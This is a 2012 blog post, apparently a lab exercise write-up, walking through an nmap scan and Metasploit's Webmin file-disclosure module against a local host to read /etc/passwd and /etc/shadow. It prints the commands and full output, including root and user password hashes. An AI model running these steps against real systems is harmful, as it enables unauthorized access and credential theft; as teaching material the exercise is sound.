Kamis, 09 Februari 2012

previllage escalation

the based rule that must we use in the way of hacking is

  1. Information Gathering
  2. Service Enumeration
  3. Vulnerability Assessment
  4. Exploit
sabtu 04 Febryari 2012 we have duty to do a previllage escalation in the computer 192.168.0.21. the most important is we only have 10 minut time.
first step is information gathering. use nmap to gathering information about what else service that running on the suspect.
root@bt:~# nmap -sV 192.168.0.21
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-04 18:06 WIT
Nmap scan report for 192.168.0.21
Host is up (0.0016s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.51 seconds
 from teks above we know something different in the port 1000 with a clue web min httpd. from that information we directly use the meta exploit to looking some tools that may be we can use.
msf > search webmin
Matching Modules
================
   Name                                    Disclosure Date  Rank    Description
   ----                                    ---------------  ----    -----------
   auxiliary/admin/webmin/file_disclosure  2006-06-30       normal  Webmin file disclosure
msf > use auxiliary/admin/webmin/file_disclosure 
msf  auxiliary(file_disclosure) > set rhost 192.168.0.21
rhost => 192.168.0.21
msf  auxiliary(file_disclosure) > exploit
[*] Attempting to retrieve /etc/passwd...
[*] The server returned: 200 Document follows
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
[*] Auxiliary module execution completed
msf  auxiliary(file_disclosure) > ls
[*] exec: ls

0bf3a6a5724cf0b0499ca7e73ac252ae.rtf
404606_2784683289646_1035152752_32311634_134946266_n.jpg
builder32-2
c16547b957eb2413ec509c66343cd7cb.rtf
Desktop
ed3691697b313fbb1bdf495b7fb1c9a3.rtf
meterpreter.pdf
VirtualBox VMs
upst.... something wrong why the password does not appear?? ok let see the option by typing show options
msf  auxiliary(file_disclosure) > show options

Module options (auxiliary/admin/webmin/file_disclosure):

   Name     Current Setting   Required  Description
   ----     ---------------   --------  -----------
   DIR      /unauthenticated  yes       Webmin directory path
   Proxies                    no        Use a proxy chain
   RHOST    192.168.0.21      yes       The target address
   RPATH    /etc/passwd       yes       The file to download
   RPORT    10000             yes       The target port
   VHOST                      no        HTTP server virtual host

msf  auxiliary(file_disclosure) > set rpath /etc/shadow/
rpath => /etc/shadow/
msf  auxiliary(file_disclosure) > exploit

[*] Attempting to retrieve /etc/shadow/...
[*] The server returned: 200 Document follows
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
[*] Auxiliary module execution completed
msf  auxiliary(file_disclosure) > ls
[*] exec: ls

0bf3a6a5724cf0b0499ca7e73ac252ae.rtf
404606_2784683289646_1035152752_32311634_134946266_n.jpg
builder32-2
c16547b957eb2413ec509c66343cd7cb.rtf
Desktop
ed3691697b313fbb1bdf495b7fb1c9a3.rtf
meterpreter.pdf
VirtualBox VMs
binggo we get the list off password and the user name obama root  etc ... that all done
 
Diposting oleh di

Tidak ada komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)